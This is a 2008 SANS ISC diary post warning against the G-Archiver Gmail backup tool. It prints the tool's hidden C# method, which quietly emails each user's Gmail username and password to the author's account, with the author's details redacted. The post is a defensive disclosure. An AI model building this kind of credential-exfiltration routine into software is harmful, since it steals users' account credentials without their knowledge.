Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog - Don't use G-Archiver InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Don't use G-Archiver

Published: 2008-03-12
Last Updated: 2008-03-12 19:26:49 UTC
by Joel Esler (Version: 4)
0 comment(s)

I saw this article the other day on Coding Horror, and someone (they didn't leave their name) sent it into us for comment.  Let me just say up front....  there are some aspects of the Coding Horror article that we ,nor I condone or agree with.  Like, deleting all the email and altering the account, etc..  instead of contacting Law Enforcement or Google.   That being said...

The backstory:

G-Archiver (notice I'm not linking to it), is a tool that someone wrote to be able to download all your Google Email and archive it locally.  Problem is that the coder that wrote the program, decided he'd be slick and put his own username and password in the code. 

Whoops.

Yeah, but it wasn't a 'coding mistake'.  He coded it in there, so when someone used this tool, it uploaded YOUR username and password to HIS email account.  (Nice huh?)

Now, I'll put the code below, but I am going to (out of the kindness of my heart, because I am sure the account is probably canceled at this point) remove this dude's password.  Who knows, he might be using it elsewhere.

 

Here's the code:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTexxxxx@gmail.com");
message.From = new MailAddress("JTexxxxx@gmail.com", "JTexxx", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTexxxxx@gmail.com", "HIS PASSWORD WAS RIGHT HERE");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

 

Basically, the lesson learned here is, be careful what you install.

So, to the anonymous person that wrote in asking for comment?  Here's my comment:  Don't install it.  Oh yeah, and "John", the coder of this tool...  Shame on you. 

UPDATE:  Someone wrote in and thought it to be a good idea to remove the actual email address. I complied.

Joel Esler

http://www.joelesler.net

0 comment(s)
Diary Archives